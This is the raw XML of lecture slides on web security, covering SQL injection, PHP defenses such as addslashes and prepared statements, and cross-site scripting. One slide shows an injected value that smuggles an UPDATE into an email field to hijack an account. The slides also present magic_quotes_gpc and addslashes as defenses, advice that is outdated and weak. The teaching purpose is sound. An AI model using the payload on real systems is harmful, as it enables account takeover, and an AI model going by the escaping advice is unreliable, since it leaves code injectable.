            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2141650" y="3429000"/>
              <a:ext cx="2143140" cy="285752"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="4643446"/>
            <a:ext cx="4286280" cy="178595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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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login_id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean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full_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" smtClean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, email</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW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FROM users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 smtClean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W</a:t>
            </a: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HERE email = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>x’;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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> users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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>SET email = ‘evil@attack.com’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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>WHERE email = ‘bob@example.com</a:t>
            </a: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’;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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="頁尾版面配置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Defenses against SQL Injection in PHP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 smtClean="0"/>
              <a:t>Sources (where tainted data come from)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_SERVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_COOKIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$_SESSION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Sinks (where tainted data should not be used)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_create_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_db_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_drop_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_unbuffered_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Prepared statements (for database accesses)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Defenses against SQL Injection (cont.) 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 smtClean="0"/>
              <a:t>Set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> parameter on in the PHP configuration file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>When the parameter is on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (single-quote), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (double quote), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (backslash) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> characters are escaped with a backslash automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( string $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The same effect as setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> on </a:t>
            </a:r>
          </a:p>
          <a:p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1285852" y="4500570"/>
            <a:ext cx="3500462" cy="150019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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = "Is your name O‘Brien?";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// Output: Is your name O\‘Brien?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt; 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Defenses against SQL Injection (cont.)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 smtClean="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Set up a statement once, and then execute it many times with different parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The ? is called a placeholder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>To execute the above query, one needs to supply the actual value for ?.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The first argument of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="cmtt10" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is the input’s type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, s for string, d for double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1285852" y="2951805"/>
            <a:ext cx="7143800" cy="147732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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", "user", "pass", "db"); $statement = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>db_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;prepare("SELECT * FROM users WHERE id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$statement-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bind_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", $id);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$statement-&gt;execute(); ...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22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Cross-Site Scripting (XSS)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 smtClean="0"/>
              <a:t>The server sends unchecked/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> data to user’s browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Attackers may exploit the vulnerability to execute client-side scripts to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hijack user sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Deface websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Conduct phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Types of cross-site scripting :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS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23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Stored XSS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zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="413268" y="1243415"/>
            <a:ext cx="8339882" cy="5301563"/>
            <a:chOff x="413268" y="1243413"/>
            <a:chExt cx="8339882" cy="5301563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1958608" y="6206422"/>
              <a:ext cx="2301977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600" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>message Victim aware of</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p: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413268" y="1245651"/>
              <a:ext cx="1108348" cy="496701"/>
            </a:xfrm>
            <a:prstGeom prst="rect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dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ttacker</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4739158" y="6371718"/>
              <a:ext cx="656794" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
